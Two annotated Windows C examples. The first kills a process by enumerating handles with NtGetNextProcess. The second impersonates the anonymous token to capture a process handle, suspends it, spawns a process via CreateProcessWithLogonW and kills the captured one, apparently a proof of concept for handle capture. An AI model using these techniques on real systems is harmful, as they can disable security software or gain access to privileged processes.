Пример #1
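// Terminates the process whose ID is ProcessId by walking the process list
// with NtGetNextProcess (PROCESS_TERMINATE requested on each handle) instead
// of opening the target by ID. Returns STATUS_NOT_SUPPORTED when
// NtGetNextProcess is unavailable, the status of PhTerminateProcess once the
// target is found, the status of the failing NtGetNextProcess call otherwise
// (typically "no more entries" when the target is absent), or STATUS_NOT_FOUND
// when the iteration cap is hit while a handle is still open.
// Fixes versus the previous version: the handle held when the target is
// found (or when the cap is reached) is now closed, and the terminate
// status is returned instead of the status of the last enumeration step.
static NTSTATUS NTAPI TerminatorTP1a(
    _In_ HANDLE ProcessId
    )
{
    NTSTATUS status;
    HANDLE processHandle;
    ULONG i;

    // NtGetNextProcess is resolved dynamically; older systems lack it.
    if (!NtGetNextProcess)
        return STATUS_NOT_SUPPORTED;

    // Seed the walk. The current-process pseudo-handle is passed as the
    // "previous" handle here; every later step passes the real handle
    // obtained in the step before.
    if (!NT_SUCCESS(status = NtGetNextProcess(
        NtCurrentProcess(),
        ProcessQueryAccess | PROCESS_TERMINATE,
        0,
        0,
        &processHandle
        )))
        return status;

    // Bounded walk: enumeration is expected to end with a failure status on
    // its own, the cap only guards against the kernel never returning one.
    for (i = 0; i < 1000; i++)
    {
        HANDLE nextHandle;
        PROCESS_BASIC_INFORMATION basicInfo;

        if (NT_SUCCESS(PhGetProcessBasicInformation(processHandle, &basicInfo)) &&
            basicInfo.UniqueProcessId == ProcessId)
        {
            // Target found: report the terminate result itself and release
            // the handle we still hold.
            status = PhTerminateProcess(processHandle, STATUS_SUCCESS);
            NtClose(processHandle);
            return status;
        }

        // Advance to the next process; the current handle is closed in
        // both outcomes, so nothing is leaked on the failure path either.
        status = NtGetNextProcess(
            processHandle,
            ProcessQueryAccess | PROCESS_TERMINATE,
            0,
            0,
            &nextHandle
            );
        NtClose(processHandle);

        if (!NT_SUCCESS(status))
            return status; // no more entries (or access denied): target not reached

        processHandle = nextHandle;
    }

    // Cap reached with a live handle: release it and report a failure rather
    // than the success status of the last enumeration step.
    NtClose(processHandle);
    return STATUS_NOT_FOUND;
}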
Пример #2
// Thread entry point. While impersonating the anonymous token it spins until
// NtGetNextProcess yields a handle into the global g_hProcess, suspends that
// process, reverts the token, records its PID, starts a suspended notepad.exe
// with network-only logon credentials, then terminates the captured process
// and exits the whole program. g_hProcess and SetProcessId are not defined
// in this listing; presumably file-scope helpers (confirm against the file).
DWORD CALLBACK CaptureAndSuspendProcess(LPVOID)
{
  // Thread-local token change; undone by RevertToSelf() below.
  // Return value is not checked, so a failed impersonation goes unnoticed.
  ImpersonateAnonymousToken(GetCurrentThread());

  // Busy-wait: NtGetNextProcess returns 0 (STATUS_SUCCESS) only when it hands
  // back a handle, any other status keeps the loop spinning. There is no
  // iteration bound and no delay, so this pegs a core until it succeeds.
  while (NtGetNextProcess(nullptr, MAXIMUM_ALLOWED, 0, 0, &g_hProcess) != 0)
  {
  }
  // Suspend status is printed but not acted upon.
  NTSTATUS status = NtSuspendProcess(g_hProcess);

  // Format/argument mismatch: NTSTATUS is a signed LONG printed with %08X and
  // GetProcessId returns a DWORD printed with %d; harmless on Win32 in
  // practice, but -Wformat would flag it (%lu is the exact DWORD specifier).
  printf("Suspended process: %08X %p %d\n", status, g_hProcess, GetProcessId(g_hProcess));
  RevertToSelf();

  // Not a Win32 API; presumably stores the PID for use elsewhere — verify.
  SetProcessId(GetProcessId(g_hProcess));
  
  // CreateProcessWithLogonW needs a writable command line, hence the array.
  WCHAR cmdline[] = L"notepad.exe";
  STARTUPINFO startInfo = {};
  PROCESS_INFORMATION procInfo = {};
  startInfo.cb = sizeof(startInfo);
  // LOGON_NETCREDENTIALS_ONLY: the literal credentials are applied to
  // outbound network authentication only, the new process otherwise runs in
  // the caller's logon session. The child starts suspended and is never
  // resumed or closed here.
  if (CreateProcessWithLogonW(L"user", L"domain", L"password", LOGON_NETCREDENTIALS_ONLY,
    nullptr, cmdline, CREATE_SUSPENDED, nullptr, nullptr, &startInfo, &procInfo))
  {
    printf("Created process %d\n", procInfo.dwProcessId);
  }
  else
  {
    printf("Create error: %d\n", GetLastError());
  }
  // Kills the captured (suspended) process, then ends this whole process;
  // the trailing return is unreachable.
  TerminateProcess(g_hProcess, 0);
  ExitProcess(0);

  return 0;
}